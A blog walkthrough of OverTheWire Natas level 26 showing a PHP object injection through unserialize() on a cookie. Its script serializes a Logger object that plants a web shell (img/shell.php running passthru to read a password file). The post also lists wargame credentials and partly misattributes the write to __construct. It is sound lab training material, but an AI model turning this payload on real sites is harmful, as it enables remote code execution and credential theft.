Natas · OverTheWire

Natas Level 26 → Level 27

Level 26

Username : natas26
Password :oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T
URL : http://natas26.natas.labs.overthewire.org

Solution

To solve this level, we first log into the natas26 application using the credentials provided above.

7-11-2017 3-02-18 PM.png

As we can see, the application has four input fields for numbers to create a line graph. Let’s put some random input and see how the application responds.

7-11-2017 3-08-42 PM.png

As we can see, the application creates a line graph and displays it is an image. Let’s check the source code now.

7-11-2017 3-10-46 PM.png

The application utilizes the following functions:

showImage($filename)
drawImage($filename)
drawFromUserdata($img)
storeData()

Apart from the functions, the application also creates a Logger class with functions: __construct($file), log($msg), and __destruct().  The application flow seems to be as follows:

If Cookie " drawing " exists: drawImage($filename) -> drawFromUserdata($img) -> showImage($imgfile) -> storeData()

The class ” Logger ” is not used throughout the application. On scrolling through the code looking for functions that interact with user data, the function unserialize() caught my eye. Since I did not have prior knowledge working with the function, I came across this article while searching about it. The article describes two conditions that should be met for the ” PHP Object Injection ” attack to work:

  • The application must have a class which implements a PHP magic method (such as __wakeup or __destruct) that can be used to carry out malicious attacks, or to start a “POP chain”.
  • All of the classes used during the attack must be declared when the vulnerable unserialize() is being called, otherwise object autoloading must be supported for such classes.

Both of these conditions are satisfied by our application. Let’s use the examples mentioned in the link to learn more on how to exploit this vulnerability.

<?php
class Logger
{
    private $logFile;
    private $initMsg;
    private $exitMsg;
    function __construct($file)
    {
        // initialise variables
        $this->initMsg="Hello\n";
        $this->exitMsg="Goodbye <? passthru('cat /etc/natas_webpass/natas27'); ?>\n\n";
        $this->logFile = "img/shell.php";
    }
}
$object = new Logger("Security Times");
echo "Serialized Object : ".serialize($object)."<pre>\n\n</pre>Base64 encoded serialized object : ".urlencode(base64_encode(serialize($object)));
?>

The above codes creates an object of class ” Logger “. Creation of an object sends a call to __construct() function which executes our command and stores the result in img/shell.php file.

The output of the above code is the cookie value that needs to be sent. Let’s replace the cookie value and see what happens.

7-11-2017 9-39-40 PM.png

As we can see above, the application responds with a warning message. Let’s now check the contents of img/shell.php file.

7-11-2017 9-41-56 PM.png

As we can see, the application responds with the password for the next level.

 

Level 27

Username : natas27
Password : 55TBjpPZUUJgVP5b3BnbG6ON9uDPVzCJ
URL : http://natas27.natas.labs.overthewire.org

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s